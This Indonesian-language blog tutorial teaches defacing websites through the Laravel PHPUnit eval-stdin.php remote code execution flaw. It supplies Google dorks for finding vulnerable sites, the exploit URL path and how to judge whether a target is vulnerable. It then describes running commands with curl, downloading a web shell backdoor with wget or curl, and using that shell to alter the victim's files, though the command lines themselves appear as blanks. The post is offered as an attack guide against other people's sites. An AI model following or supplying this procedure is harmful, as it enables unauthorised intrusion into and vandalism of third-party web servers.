Laravel PHPUnit RCE (Remote Code Execution)

Evil Twin

Hallo, 
Kembali lagi di Evil Twin - Blog, Oke pada artikel kali ini Saya ingin memberikan Tutorial Deface Menggunakan POC Laravel PHPUnit RCE (Remote code execution) dan pastinya bisa Mengupload Shell Backdoor.

Tutorial ini mungkin sudah tidak dibutuhkan lagi oleh para Defacer old karena ini memang cara yang sudah lama sekali, Namun tidak ada salahnya kan Saya baru tulis disini (ya karena blog ini juga baru) 😁

Tanpa berlama-lama lagi langsung aja ke Tutorialnya.

Mencari Target

Seperti deface dengan metode-metode lainnya, Tahap pertamanya adalah mencari targetnya. Kalian bisa mencarinya menggunakan Google Dork dibawah ini:
inurl:/vendor/phpunit/phpunit/src
inurl:/phpunit/src/Util/PHP/
Dan untuk exploitnya adalah sebagai berikut:
/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Tentunya dikembangin lagi ya dorknya, Biar dapat website yang perawan, hehe.

Ciri-Ciri Vuln

Untuk ciri-ciri bahwa website target tersebut Vuln umumnya adalah blank, terkadang yang terdownload juga vuln Ketika dimasukkan exploit, seperti ini:
http://target/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

Website target Saya menampilkan blank, Kemungkinan vuln 😃

RCE (Remote Code Execution) Menggunakan CURL

Jika sudah medapatkan target yang kemungkinan vuln, Maka selanjutnya adalah mencoba mengirim command menggunakan CURL, Install CURL dan Masukkan command dibawah ini:



Yapss, terlihat nama servernya yaitu Linux server1.xxxxx xxxxxxxx.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

Upload Shell

Jika sudah memastikan bahwa website target Kalian vuln, Maka selanjutnya adalah mengupload shell. Kita bisa memanfaatkan wget, curl dll untuk mendownload Shell nya. Command lebih lengkapnya adalah sebagai berikut:



Outputnya hanya blank saja, Tapi Saya rasa memang seperti itu.

Akses Shell

Jika sudah mendownload shell di website target menggunakan command seperti diatas, Maka selanjutnya adalah mengakses shellnya seperti ini:
http://target/vendor/phpunit/phpunit/src/Util/PHP/sh3ll.php

Shell berhasil diakses! Sekarang bebas mau ngapain aja, Edit, rename, delete, chmod etc.

Akhir Kata

Oke mungkin cukup sampai disini aja artikel tentang "Exploit POC Laravel PHPUnit RCE (Remote Code Execution)".
Mohon maaf bila ada kesalahan kata dan sebagainya, Mohon dimaklumi karena Saya juga masih dalam tahap belajar.

Semoga bermanfaat dan Sampai jumpa di artikel selanjutnya!
Evil Twin